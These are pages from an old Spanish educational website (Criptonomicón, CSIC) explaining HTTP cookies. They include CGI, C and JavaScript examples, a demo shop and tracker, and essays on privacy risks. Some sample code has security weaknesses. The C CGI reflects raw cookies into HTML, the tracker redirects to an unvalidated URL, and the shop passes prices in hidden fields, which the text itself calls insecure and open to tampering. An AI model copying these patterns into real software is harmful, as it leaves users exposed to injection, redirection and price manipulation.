file:///C|/TEMP/criptonomicon/criptonomicon/cookies/fuentecookies.html [25/10/2000 02:32:16 p.m.]

Cookies - Recetas en CGI

Principal
Riesgos
Usos
Ejemplos

Ejemplo en ShellScript

A dieta
Recursos

Podemos enviar una cookie mediante el sencillsimo shell script


siguiente, guardndolo en un fichero de nombre cualquiera en el
directorio cgi-bin:

Descripcin
La caja de las cookies
Ingredientes
Recetas en JavaScript
Recetas en CGI
Recetas en ASP

#!/bin/sh
Horno Express
echo "Content-type: text/html"
echo "Set-cookie: ejemplo = shellscript; expires =
Wednesday, 30-Jul-99 12:00:00 GMT"
echo ""
echo "<html><head><title>Ejemplo de
cookie</title></head><body>Te acabo de enviar una
cookie</body></html>"
Pulsando el botn vers el resultado de ejecutar el shell script anterior:
enviar cookie1

Si pulsas el botn de leer cookie1, te dars cuenta de que esa cookie no aparece
listada, ya que nos la ha enviado otro servidor. Si miras en la ventana de direccin,
vers que el servidor que te ha enviado la pgina que est leyendo en este momento
se llama www.iec.csic.es, mientras que el servidor que te ha enviado la cookie
era caniles.tic.iec.csic.es. Si quisiramos leer esa cookie desde este
servidor, habra que aadir un par de campos a la cookie, de modo que el segundo
echo quedara as:
#!/bin/sh
echo "Content-type: text/html"
echo "Set-cookie: ejemplo = shellscript; expires =
Wednesday, 30-Jul-99 12:00:00 GMT; path = /; domain =
.iec.csic.es;"
echo ""
echo "<html><head><title>Ejemplo de
cookie</title></head><body>Te acabo de enviar una
cookie</body></html>"
Puedes ver los efectos pulsando el botn de enviar cookie2:
enviar cookie2

file:///C|/TEMP/criptonomicon/criptonomicon/cookies/receshell.html (1 of 2) [25/10/2000 02:32:17 p.m.]

Cookies - Recetas en CGI

Ahora, pulsando el botn de leer cookie2, comprobars que s que aparece la cookie,
puesto que este servidor (www.iec.csic.es) encaja en el dominio especificado
(.iec.csic.es) y el path est puesto a /.

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.

file:///C|/TEMP/criptonomicon/criptonomicon/cookies/receshell.html (2 of 2) [25/10/2000 02:32:17 p.m.]

file:///C|/TEMP/criptonomicon/criptonomicon/cookies/cookies.txt

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
void set_cookie(char *name, char *value, char *expires, char *path,
char *domain, short secure)
{
printf("Set-Cookie: %s=%s;",name,value);
if (expires != NULL)
printf(" EXPIRES=%s;",expires);
if (path != NULL)
printf(" PATH=%s;",path);
if (domain != NULL)
printf(" DOMAIN=%s;",domain);
if (secure)
printf(" SECURE");
printf("\n");
}
int main()
{
char *cookies = getenv("HTTP_COOKIE");
set_cookie( "ejemplo", "CookieCGI", "Thursday, 31-Dec-1998 12:00:00 GMT", NULL,
NULL, 0 );
printf("Content-type: text/html\n\n");
printf("<html> <head>\n");
printf("<title>Cookies</title>\n");
printf("</head>\n\n");
printf("<body>\n");
printf( "Has recibido las siguientes cookies:<P>" );
printf( "%s<P>", cookies );
printf("</body> </html>\n");
return 0;
}

file:///C|/TEMP/criptonomicon/criptonomicon/cookies/cookies.txt [25/10/2000 02:32:17 p.m.]

Cookies - Ejemplo de contador de visitas

Contador de visitas
En todos los guiones que hagamos, se debe copiar en primer lugar las funciones de escribir, leer y borrar cookies, as como las
variables necesarias para las fechas de caducidad, entre las etiquetas <HEAD> y </HEAD>. Si no sabes cmo generar esas
funciones, encontrars instrucciones en el Horno Express. A su vez, todas las instrucciones en JavaScript anteriores deben
aparecer entre las etiquetas apropiadas:

<SCRIPT LANGUAGE="JavaScript">
<!-- Va todo comentado por si el navegador es muy antiguo y no reconoce los guiones
JavaScript
function Contador(info){
// Cuntas veces
var cuenta = getCookie('Veces')
if ( cuenta== null) {
cuenta = 0;
}
else{
cuenta++;
}
setCookie ('Veces', cuenta, caduca);
return cuenta+1;
}
// El resto de funciones
//-->
</SCRIPT>
A continuacin, para aadir el contador de visitas, copia el siguiente cdigo donde quieres que aparezca el texto del contador:

<SCRIPT LANGUAGE="JavaScript">
<!-var visitas = Contador();
if ( visitas == 1 ) {
document.write("Hola, esta es la primera vez que visitas esta pgina.
");
}
else
document.write("Hola, has visitado esta pgina <b>" + visitas + "</b>
veces. ")
//-->
</SCRIPT>
El efecto sera el siguiente:
Si actualizas la pgina o vas a otro sitio y vuelves ms tarde, comprobars cmo el contador se va incrementando.
Tambin puedes hacer que el mensaje aparezca en una ventana, modificando la instruccin anterior:

<SCRIPT LANGUAGE="JavaScript">
<!-alert("Hola, has visitado esta pgina " + visitas + " veces.");
//-->

file:///C|/TEMP/criptonomicon/criptonomicon/cookies/contador.html (1 of 2) [25/10/2000 02:32:18 p.m.]

Cookies - Ejemplo de contador de visitas

</SCRIPT>
Puedes comprobarlo pulsando el botn:
[Volver a pgina de ejemplos] [Siguiente ejemplo]

file:///C|/TEMP/criptonomicon/criptonomicon/cookies/contador.html (2 of 2) [25/10/2000 02:32:18 p.m.]

Cookies - Bienvenida personalizada

Bienvenida personalizada
En todos los guiones que hagamos, se debe copiar en primer lugar las funciones de escribir, leer y borrar cookies, as como
las variables necesarias para las fechas de caducidad, entre las etiquetas <HEAD> y </HEAD>. Si no sabes cmo generar
esas funciones, encontrars instrucciones en el Horno Express. A su vez, todas las instrucciones en JavaScript anteriores,
ms la que recoge tu nombre, deben aparecer entre las etiquetas apropiadas:

<SCRIPT LANGUAGE="JavaScript">
<!-- Va todo comentado por si el navegador es muy antiguo y no reconoce los guiones
JavaScript
function Bienvenido(info){
//Quin eres?
var Visitante = getCookie('Visitante')
if (Visitante == null) {
Visitante = prompt("Puedes darme tu nombre?", "Nadie");
setCookie ('Visitante ', Visitante, caduca);
}
return Visitante;
}
// El resto de funciones
//-->
</SCRIPT>
A continuacin, para aadir la bienvenida personalizada, copia el siguiente cdigo donde quieres que aparezca el texto de
bienvenida:

<SCRIPT LANGUAGE="JavaScript">
<!-document.write("Hola, <b>" + Bienvenido() + "</b>. Me alegro de verte por
aqu");
//-->
</SCRIPT>
El efecto sera el siguiente:

Si actualizas la pgina o vas a otro sitio y vuelves ms tarde, comprobars cmo recuerdo tu nombre.
Sera interesante aadir la posiblidad de cambiar el nombre, bien porque haya varias usuarios en la misma mquina, bien
porque haya sido introducido incorrectamente. La manera de hacerlo sera aadir unos botones, mediante el siguiente
cdigo:

<FORM>
<INPUT TYPE="button" VALUE="borrar nombre" onClick="deleteCookie('Visitante')">
<INPUT TYPE="button" VALUE="cambiar nombre" onClick="cambiaNombre()">
</FORM>
Para ello es necesario aadir junto a las anteriores la funcin para cambiar el nombre, que ser la siguiente:

function cambiaNombre() {
file:///C|/TEMP/criptonomicon/criptonomicon/cookies/bienvenida.html (1 of 2) [25/10/2000 02:32:19 p.m.]

Cookies - Bienvenida personalizada

var validez = 30;


var caduca = new Date();
caduca.setTime(caduca.getTime() + (validez*24*60*60*1000));
var Visitante = prompt("Puedes darme tu nombre?", "Nadie");
setCookie ('Visitante ', Visitante, caduca);
}
Tambin puedes hacer que el mensaje aparezca en una ventana, modificando la instruccin anterior:

<SCRIPT LANGUAGE="JavaScript">
<!-alert("Hola, " + Bienvenido() + ". Me alegro de verte por aqu");
//-->
</SCRIPT>
Puedes comprobarlo pulsando el botn:
[Volver a pgina de ejemplos] [Siguiente ejemplo]

file:///C|/TEMP/criptonomicon/criptonomicon/cookies/bienvenida.html (2 of 2) [25/10/2000 02:32:19 p.m.]

Cookies - ltima visita

ltima visita
En todos los guiones que hagamos, se debe copiar en primer lugar las funciones de escribir, leer y borrar cookies, as como
las variables necesarias para las fechas de caducidad, entre las etiquetas <HEAD> y </HEAD>. Si no sabes cmo generar esas
funciones, encontrars instrucciones en el Horno Express. A su vez, todas las instrucciones en JavaScript anteriores, ms las
especficas para la ltima visita,deben aparecer entre las etiquetas apropiadas:

<SCRIPT LANGUAGE="JavaScript">
<!-- Va todo comentado por si el navegador es muy antiguo y no reconoce los guiones
JavaScript
function Cuando(info){
// Cundo me visitas
var ahora = new Date()
var tiempo = 0;
tiempo = getCookie('Cuando');
tiempo = tiempo * 1;
var ultimaVezFormateado = new Date(tiempo); // pasa de nmero a fecha
var intLastVisit = (ultimaVezFormateado.getYear() *
10000)+(ultimaVezFormateado.getMonth() * 100) + ultimaVezFormateado.getDate()
var ultimaVezEnFecha = "" + ultimaVezFormateado; // se usan funciones
substring
var diaSemana = ultimaVezEnFecha.substring(0,3)
var fechaMes = ultimaVezEnFecha.substring(4,11)
var horaDia = ultimaVezEnFecha.substring(11,16)
var anio = ultimaVezEnFecha.substring(23,25)
var texto = diaSemana + ", " + fechaMes + " a las " +horaDia // lo muestra
setCookie ("Cuando", ahora.getTime(), caduca)
return texto;
}
// El resto de funciones
//-->
</SCRIPT>
A continuacin, para aadir la informacin de ltima visita, copia el siguiente cdigo donde quieres que aparezca el texto con
la informacin:

<SCRIPT LANGUAGE="JavaScript">
<!-document.write("Hola. La ltima vez que visitaste esta pgina fue en <b>" +
Cuando() +"<b>. ")
//-->
</SCRIPT>
El efecto sera el siguiente:

Si actualizas la pgina o vas a otro sitio y vuelves ms tarde, comprobars cmo los datos de la ltima visita se van
actualizando.
Tambin puedes hacer que el mensaje aparezca en una ventana, modificando la instruccin anterior:

file:///C|/TEMP/criptonomicon/criptonomicon/cookies/ultima.html (1 of 2) [25/10/2000 02:32:19 p.m.]

Cookies - ltima visita

<SCRIPT LANGUAGE="JavaScript">
<!-alert("Hola. La ltima vez que visitaste esta pgina fue en " + Cuando() +".
")
//-->
</SCRIPT>
Puedes comprobarlo pulsando el botn:
[Volver a pgina de ejemplos] [Siguiente ejemplo]

file:///C|/TEMP/criptonomicon/criptonomicon/cookies/ultima.html (2 of 2) [25/10/2000 02:32:19 p.m.]

Cookies - Ejemplo en JavaScript

Todos juntos
A continuacin, para aadir el contador de visitas, copia el siguiente cdigo donde quieres que aparezca el texto del contador:

<SCRIPT LANGUAGE="JavaScript">
<!-var visitas = Contador();
if ( visitas == 1 ) {
document.write("Hola, <b>" + Bienvenido() + "</b>. Esta es la primera
vez que visitas esta pgina. ");
Cuando();
}
else
document.write("Hola, <b>" + Bienvenido() + "</b>. Has visitado esta
pgina <b>" + visitas + "</b> veces. La ltima fue en <b>" + Cuando() +"</b>. ")
//-->
</SCRIPT>
El efecto sera el siguiente:

Si actualizas la pgina o vas a otro sitio y vuelves ms tarde, comprobars cmo el contador se va incrementando.
Como en los casos anteriores, tambin puedes hacer que el mensaje aparezca en una ventana, modificando la instruccin
anterior:

<SCRIPT LANGUAGE="JavaScript">
<!-alert("Hola, " + Bienvenido() + ". Has visitado esta pgina " + visitas + "
veces. La ltima fue en " + Cuando() +".");
//-->
</SCRIPT>
Puedes comprobarlo pulsando el botn:
[Volver a pgina de ejemplos] [Siguiente ejemplo]

file:///C|/TEMP/criptonomicon/criptonomicon/cookies/juntos.html [25/10/2000 02:32:19 p.m.]

Cookies - Ejemplo de personalizacin de colores

Pgina con colores personalizados


Si has leido los ejemplos anteriores, ya no te harn falta las indicaciones sobre etiquetas y cabeceras. Si
quieres ver los entresijos de esta aplicacin, edita la pgina HTML y examina el cdigo fuente.
La forma como funciona es la siguiente:
Selecciona el tipo de colores que te guste ms y acontinuacin pulsa el botn de fijar color. La pgina se
actualiza automticamente y vers que cambia a los colores seleccionados.
Nota: Si usas Internet Explorer es posible que no se actualice automticamente. En ese caso, pulsa el botn de la barra de navegacin que dice "Actualizar".

Pgina normal
Pgina chillona
Pgina de hacker
Pgina delicada

[Volver a pgina de ejemplos]

file:///C|/TEMP/criptonomicon/criptonomicon/cookies/colores.html [25/10/2000 02:32:19 p.m.]

La Tienda Virtual

La Tienda Virtual
Esta es una tienda muy sencillita, con un par de secciones y unos pocos artculos en cada seccin, pero
nos sirve para ilustrar una manera como podran funcionar los carritos de la compra.
Puedes ir de compras por las siguentes secciones:
Seccin de informtica
Seccin de deportes
[Volver a pgina de ejemplos] [Ver el carrito] [Pasar por caja] [Vaciar el carrito]

AVISO MUY IMPORTANTE!


Un carrito de la compra real nunca se deber implementar de esta forma, pues es
altamente inseguro. Estos ejemplos estn escritos EXCLUSIVAMENTE a ttulo
demostrativo, pero nunca debern tomarse como gua para desarrollar una
aplicacin real de compra.

file:///C|/TEMP/criptonomicon/criptonomicon/cookies/tienda.html [25/10/2000 02:32:20 p.m.]

La Tienda Virtual - Informtica

Seccin de informtica
Pantalla de ordenador 125.000 pta (Ref. 10001)
Cantidad:
Altavoces 5.000 pta (Ref. 19831)
Cantidad:
Lector de CD-ROM 15.000 pta (Ref. 12000)
Cantidad:
Pedir

Ntese que se utilizan campos ocultos para pasar al servidor la informacin sobre
el precio de los artculos. Si esta informacin no fuera contrastada, se le podra
engaar modificando el valor de las etiquetas con un precio menor. Puedo
comprobarlo editando el cdigo fuente de esta pgina.
[Volver a la tienda] [Ver el carrito] [Pasar por caja] [Vaciar el carrito]

file:///C|/TEMP/criptonomicon/criptonomicon/cookies/informatica.html [25/10/2000 02:32:20 p.m.]

La Tienda Virtual - Deportes

Seccin de deportes
Pies de gato 12.000 pta (Ref. 19801)
Cantidad:
Cuerda dinmica 22.500 pta (Ref. 21003)
Cantidad:
Arns 10.200 pta (Ref. 82078)
Cantidad:
Pedir

Ntese que se utilizan campos ocultos para pasar al servidor la informacin sobre
el precio de los artculos. Si esta informacin no fuera contrastada, se le podra
engaar modificando el valor de las etiquetas con un precio menor. Puedo
comprobarlo editando el cdigo fuente de esta pgina.
[Volver a la tienda] [Ver el carrito] [Pasar por caja] [Vaciar el carrito]
Nota: si quieres ver cmo funciona la mejor tienda virtual del ciberespacio en artculos de montaa, psate por Barrabs.

file:///C|/TEMP/criptonomicon/criptonomicon/cookies/deportes.html [25/10/2000 02:32:20 p.m.]

Analizador de la actividad del usuario

Analizador de la actividad del usuario


Esta es una aplicacin trivial para seguir los pasos de un usuario por nuestra Web. Cada vez que solicita
una nueva pgina, su peticin es filtrada por un programa CGI que registra en un fichero su direccin de
mquina, su hora de visita, la pgina visitada y el valor de su cookie.
Pulsando el siguiente botn se recibe una cookie con el identificador de usuario. Si no se pulsa, no se
podr registrar esta informacin en el fichero de seguimiento, por lo que la informacin que recibiremos
ser menor, por ejemplo, no podremos distinguir dos usuarios distintos navegando desde la misma
mquina.
entrar en el sitio

Ya slo nos faltara escribir un sencillo programa que examine los contenidos del fichero de registro,
para calcular estadsiticas como nmero de visitas a una pgina, procedencia ms comn de los
visitantes, quin es el visitante ms asiduo (se le podra dar un premio), etc.
Nota - Si examina varias veces el registro, no olvide pulsar el botn de recargar la pgina.

[Volver a pgina de ejemplos] [Ver el registro]

file:///C|/TEMP/criptonomicon/criptonomicon/cookies/actividad.html [25/10/2000 02:32:20 p.m.]

Cookies - Ejemplo de refresco de banners

Principal
Qu son
Riesgos
Usos
A dieta
Ejemplos
Recursos

Refresco de banners
Si te fijas en el cartelito o banner de ah arriba, pondr BANNER 0 si es la primera
vez que visitas esta pgina. En caso contrario, aprecer un nmero, hasta 4, ya que a
partir de ah se retorna cclicamente al 0. En otras palabras, lo que estoy haciendo es
enviarte una cookie en la que especifico qu banner se te mostrar, evitando repetirte
siempre el mismo banner, una y otra vez (banner burnout).
Este es un truco comnmente utilizado por los publicistas para evitar que veas
demasiadas veces el mismo anuncio. Por supuesto, se podra refinar, mostrando un
banner u otro en funcin de tus preferencias, controlar cuntas veces se muestra sin
que hagas click en l, etc.

Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.

file:///C|/TEMP/criptonomicon/criptonomicon/cookies/banner.html [25/10/2000 02:32:21 p.m.]

Cookies - Usos bien vistos

Principal
Qu son
Riesgos
Ejemplos
Usos de las cookies

A dieta
Recursos

Bien vistos

Usos bien vistos

Mal vistos
Alternativas

Personalizacin de las pginas


A menudo se nos presenta la posibilidad de elegir entre navegar con o sin frames. A
veces nos dan a elegir incluso el color del fondo o el tipo de letra (visita el ejemplo).
Toda esta informacin queda almacenada en una cookie, para que en visitas
posteriores las pginas aparezcan a nuestro gusto, sin el engorro de ir apretando
botones de configuracin.
Idioma
Nos hemos topado ms de una vez con pginas que nos ofrecen la posibilidad de
elegir entre varios idiomas. Pues bien, si la primera vez que me conecto y elijo un
idioma determinado, esta informacin se almacena en una cookie, las prximas veces
que acceda a esas pginas, el texto aparecer en el idioma seleccionado.
Tiendas electrnicas
Se han desarrollado sistemas de venta que almacenan en una cookie los gustos del
usuario basndose en las pginas visitadas cuando accede para efectuar sus pedidos.
As, en lo sucesivo, cuando se conecte de nuevo, se le puede informar de las ltimas
novedades en aquellos artculos de su preferencia.
Carritos de la compra
Permiten recordar los artculos que un cliente va adquiriendo a medida que se mueve
por las pginas del catlogo, como si los estuviera cargando en un carrito de la
compra virtual, de manera que no tenga que ir pagndolos uno a uno, sino pagarlos
todos de una vez cuando vaya a la pgina de pago (visita el ejemplo).

Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.

file:///C|/TEMP/criptonomicon/criptonomicon/cookies/bien.html [25/10/2000 02:32:21 p.m.]

Cookies - Usos no tan bien vistos

Principal
Qu son
Riesgos
Ejemplos
Usos de las cookies

A dieta
Recursos

Bien vistos

Usos no tan bien vistos

Mal vistos
Alternativas

Seguimiento de las visitas a un Web


He aqu una aplicacin controvertida. Su objetivo es mantener un historial de las
pginas visitadas por los usuarios dentro del servidor con el fin de conocer cules son
las pginas menos visitadas, pginas a las que llega la gente pero de las que luego no
sabe salir o de las que salen por falta de inters. Tambin permiten recabar registros
ms exactos sobre el nmero de visitantes a una pgina, ya que las cookies permiten
diferenciar 30 personas distintas visitando un sitio de una misma persona pulsando
30 veces el botn de recargar. Sin embargo, muchos piensan que se trata de una
violacin de la intimidad.
Carteles publicitarios
Muchas pginas muestran distintos anuncios o espacios publicitarios (banners) cada
vez que nos conectamos a ellas. La forma de hacerlo es guardar en una cookie el
identificador del ltimo anuncio que nos han mostrado, de manera que la cada vez
que nos conectemos nos presenten uno distinto.
Marketing personalizado
Se trata de la aplicacin con fines comerciales ms extendida. Las cookies se pueden
emplear para construir un perfil de usuario con los lugares visitados, los anuncios
(banners) que se han seguido, los productos comprados, etc. Esta informacin es
posteriormente usada para enviarle anuncios que ellos creen le pueden interesar, as
como para variar los anuncios mostrados (ver prrafo anterior). Ahora bien, y si la
compaa vende esta informacin a terceros? La polmica est servida.
Almacenamiento de santo y sea
Todos hemos visitado sitios en los que nos piden nombre y contrasea para poder
acceder a su contenido. Algunos de estos sitios adems almacenan estos datos en una
cookie que se guarda en el disco duro del usuario. De esta forma, la siguiente vez que
acceda no se le volver a pedir su santo y sea. Si bien ningn otro servidor puede
acceder a esta informacin, cualquier usuario accediendo fsicamente al ordenador
puede leer la cookie que contiene estos datos. Por ello, conviene almacenarlos
cifrados, y tambin que caduquen al poco tiempo, das o incluso horas.

file:///C|/TEMP/criptonomicon/criptonomicon/cookies/mal.html (1 of 2) [25/10/2000 02:32:21 p.m.]

Cookies - Usos no tan bien vistos

Almacenamiento de informacin sensible


Aunque parezca mentira, existen sitios que almacenan nuestro nmero de tarjeta en
una cookie, para que en futuras transacciones comerciales con ellos no tengamos que
introducirlo. Mejor no tener transacciones con gente as. Si bien las cookies podran
enviarse sobre SSL, tambin deberan cifrarse en el disco duro del usuario.

Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.

file:///C|/TEMP/criptonomicon/criptonomicon/cookies/mal.html (2 of 2) [25/10/2000 02:32:21 p.m.]

Cookies - Alternativas a las cookies

Principal
Qu son
Riesgos
Ejemplos
Usos de las cookies

A dieta
Recursos

Bien vistos

Alternativas a las cookies

Mal vistos
Alternativas

Como queda dicho, la razn de ser de las cookies es almacenar el estado de la sesin
entre peticiones sucesivas, puesto que el protocolo HTTP es sin estado. No obstante,
existen por lo menos otros dos mtodos que ya eran usados mucho antes de que
aparecieran las cookies, a saber, transmitir datos del estado de la sesin a travs de
campos ocultos en los formularios CGI y aadir datos del estado al final de un URL.
Como ejemplo del ltimo enfoque, considrese el siguiente URL:
/cgi-bin/tracker.exe?curso.html
donde tracker.exe es un programa que filtra todas las direcciones y almacena en
un fichero el nombre y direccin IP de la mquina que solicita la pgina, la hora de la
peticin, y la pgina solicitada. La direccin despus del interrogante es la de la
pgina que se quiere visitar. De esta manera y sin necesidad de cookies podemos
hacer un seguimiento exhaustivo del nmero y la identidad de las visitas a una
pgina. Puedes ver mi ejemplo de programa de seguimiento en CGI.
Por otro lado, para usar los formularios con campos ocultos es necesario procesar
todas las pginas mediante "form submit", un mtodo que hoy en da ya queda muy
obsoleto, aunque puede seguir usndose en algunas aplicaciones, como en carritos de
compra, adems de consumir un gran ancho de banda por su voluminosidad.
Las cookies mejoran los mtodos anteriores en trminos de facilidad de uso,
rendimiento, flexibilidad y seguridad.

Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.

file:///C|/TEMP/criptonomicon/criptonomicon/cookies/alternativas.html [25/10/2000 02:32:21 p.m.]

file:///C|/TEMP/criptonomicon/criptonomicon/cookies/tracker.txt

#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#define REMOTE_HOST getenv("REMOTE_HOST")
#define QUERY_STRING getenv("QUERY_STRING")
char x2c(char *what)
{
register char digit;
digit = (what[0] >= 'A' ? ((what[0] & 0xdf) - 'A')+10 : (what[0] - '0'));
digit *= 16;
digit += (what[1] >= 'A' ? ((what[1] & 0xdf) - 'A')+10 : (what[1] - '0'));
return(digit);
}
void unescape_url(char *url)
{
register int x,y;
for (x=0,y=0; url[y]; ++x,++y) {
if((url[x] = url[y]) == '%') {
url[x] = x2c(&url[y+1]);
y+=2;
}
}
url[x] = '\0';
}
int main( )
{
char * sHitsFile = "visitas.txt";
FILE * fHits;
time_t ltime;
char * sURL = (char *)QUERY_STRING;
unescape_url( sURL );
if ( ( fHits = fopen( sHitsFile, "a+" ) ) == NULL ) {
fprintf(stderr,"Error -- No se ha podido abrir el fichero de hits");
return 1;
}
time( &ltime );
fprintf( fHits, "%s\n%s%s\n\n", REMOTE_HOST, ctime( &ltime ), sURL );
fclose( fHits );
printf( "Location: %s\n\n", sURL );
return 0;
}

file:///C|/TEMP/criptonomicon/criptonomicon/cookies/tracker.txt [25/10/2000 02:32:22 p.m.]

Cookies - Riesgos imaginarios de las cookies

Principal
Qu son
Usos
Ejemplos
A dieta
Recursos
Reverso tenebroso
Riesgos imaginarios

Riesgos imaginarios
Lo que las cookies no pueden hacer

Riesgos reales
Buenas intenciones
Marketing
personalizado

Gran herramienta o
A pesar de que circulan muchos bulos sobre falsos virus por
amenaza?
Internet, una creencia muy extendida entre los usuarios inexpertos
La Gran Cookie nos
es que las cookies nos pueden contagiar un virus (bueno, a
vigila
nosotros no, al ordenador). Para ello, es requisito indispensable que
Histeria colectiva
la cookie contenga cdigo ejecutable, por un lado, y adems que
luego se le mande ejecutar. En primer lugar, hasta la fecha no se conoce una cookie
ejecutable; en segundo lugar, aunque la hubiera, adems debera existir una aplicacin
que la invocase para que el cdigo destructivo se ejecutara, lo cual exigira una ardua
labor de programacin. As que en vez de preocuparse por imaginarios virus
transmitidos por las cookies, es mejor estar atento a los agujeros de seguridad
tangibles y reales de los navegadores, a los fallos de seguridad de Java, JavaScript,
ActiveX, CGI, y dems componentes de la Familia Dinmica de la Web.

Otro bulo muy extendido es que una cookie nos desnuda, desvelando nuestra
intimidad. Una cookie de HTTP tampoco puede ser usada para extraer datos de tu
disco duro, conseguir tu direccin de correo electrnico o robar informacin sensible
acerca de tu persona. Para ello existen otras formas mucho ms prometedoras y que
ya funcionan bien sin necesidad de cookies. En definitiva, una cookie no almacena
ms informacin confidencial que la que le queramos dar al servidor que nos la enva.
Ms bulos. Tambin se dice que el servidor consigue acceso a nuestro disco duro
gracias a las cookies. No es exacto. No hay que perder de vista que en el caso de las
cookies no es el servidor el que lee o escribe en nuestro disco duro, sino el navegador,
de la misma forma que lee o escribe en nuestro cache de disco (y nadie se rasga las
vestiduras por ello, y eso que el Explorer tuvo un serio agujero de seguridad por su
causa). El servidor pide al navegador que lea o escriba las cookies, pero, en ningn
caso, tiene a travs de ellas acceso directo a nuestro disco duro.
A pesar de todo, si aparentemente son tan inofensivas, entonces, de dnde procede
todo el revuelo acerca de las cookies?
file:///C|/TEMP/criptonomicon/criptonomicon/cookies/imaginarios.html (1 of 2) [25/10/2000 02:32:22 p.m.]

Cookies - Riesgos imaginarios de las cookies

Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre privacidad,
por favor consulte la declaracin de poltica sobre privacidad.

file:///C|/TEMP/criptonomicon/criptonomicon/cookies/imaginarios.html (2 of 2) [25/10/2000 02:32:22 p.m.]

Cookies - Riesgos reales de las cookies

Principal
Qu son
Usos
Ejemplos
A dieta
Recursos
Reverso tenebroso
Riesgos imaginarios

Riesgos reales
Lo que las cookies s pueden hacer
Las cookies son simplemente texto, que se puede editar
perfectamente con cualquier editor ASCII, y como tales, son
elementos pasivos que no pueden emprender ninguna accin. Slo
pueden ser ledos o escritos, pero no pueden ejecutarse ni mandar
ejecutar ningn programa, por lo tanto no representan ninguna
amenaza para tu ordenador ni pueden infectarlo con ningn virus.

Riesgos reales
Buenas intenciones
Marketing
personalizado
Gran herramienta o
amenaza?
La Gran Cookie nos
vigila
Histeria colectiva

Es importante comprender que por diseo las cookies poseen las siguientes
limitaciones:
Trescientas cookies en total en el archivo de cookies. Si llega la nmero 301, se
borra la ms antigua.
4 Kbytes por cookie, para la suma del nombre y valor de la cookie.
Veinte cookies por servidor o dominio (los hosts y dominios completamente
especificados se tratan como entidades separadas y tienen una limitacin de 20
cookies cada uno, no juntos).
Ninguna mquina que no encaje en el dominio de la cookie puede leerla. Es
decir, la informacin almacenada en una cookie no puede ser leda por una
mquina distinta de la que la envi.
An as, las cookies no son un buen elemento de seguridad, ya que cualquiera que
conozca mnimamente su funcionamiento podra acceder fsicamente o tal vez a
travs de red local, pero no a travs de Internet, a los datos guardados en las cookies
dentro de un ordenador y utilizar todos los servicios a los que permiten acceder los
nombres y contraseas en ellas almacenados.
Por otro lado, s que es cierto que lo que inicialmente se cre como un mecanismo
para beneficiar al usuario ha sido pervertido para beneficiar al anunciante, que
husmea nuestras idas y venidas y almacena perfiles de usuario para luego dirigirnos
su propaganda personalizada. Esta posibilidad abre las puertas a especulaciones
file:///C|/TEMP/criptonomicon/criptonomicon/cookies/reales.html (1 of 2) [25/10/2000 02:32:23 p.m.]

Cookies - Riesgos reales de las cookies

Orwellianas acerca de su venta a terceros o su anlisis en oscuros despachos de


Interior.

Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre privacidad,
por favor consulte la declaracin de poltica sobre privacidad.

file:///C|/TEMP/criptonomicon/criptonomicon/cookies/reales.html (2 of 2) [25/10/2000 02:32:23 p.m.]

Cookies - La intencin era buena

Principal
Qu son
Usos
Ejemplos
A dieta
Recursos
Reverso tenebroso
Riesgos imaginarios

La intencin era buena

Riesgos reales
Buenas intenciones

Marketing
Cuando se crearon, las cookies tenan como objetivo favorecer al
personalizado
usuario. Al permitir que los sitios Web recordasen a los
Gran herramienta o
visitantes, se les poda ofrecer un servicio individualizado,
amenaza?
avisarles de novedades y liberarles de ciertas tareas engorrosas de
La Gran Cookie nos
identificacin. Algo parecido a entrar en un restaurante y que el
vigila
camarero nos llame por nuestro nombre, nos siente en nuestra mesa Histeria colectiva
favorita, nos sirva nuestro vino preferido y nos sugiera el nuevo
men que segn nuestros gustos seguramente nos agradar. Sin embargo, esa
capacidad de recordar constituye el instrumento del que se sirven para rastrearnos. De
ah surge la preocupacin por la intimidad y el potencial para violarla de las cookies.

Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre privacidad,
por favor consulte la declaracin de poltica sobre privacidad.

file:///C|/TEMP/criptonomicon/criptonomicon/cookies/buenas.html [25/10/2000 02:32:23 p.m.]

Cookies - Marketing personalizado

Principal
Qu son
Usos
Ejemplos
A dieta
Recursos

Marketing personalizado
A quin no le ha sucedido recibir una cookie de, por ejemplo,
Doubleclick, mientras visitaba un sitio que aparentemente nada
tena que ver con esa compaa? Que t sepas, nunca has visitado
sus pginas ni has mantenido relacin con ellos. El navegador te ha
avisado de que vas a recibir una cookie de Doubleclick, pero no
sabes muy bien por qu, si en realidad no ests visitando su sitio ni
lo has hecho anteriormente.

Reverso tenebroso
Riesgos imaginarios
Riesgos reales
Buenas intenciones
Marketing
personalizado
Gran herramienta o
amenaza?
La Gran Cookie nos
vigila

La respuesta, sin embargo, es bien sencilla. Si miras en la cabecera Histeria colectiva


de la pgina, vers que aparece un espacio publicitario o banner.
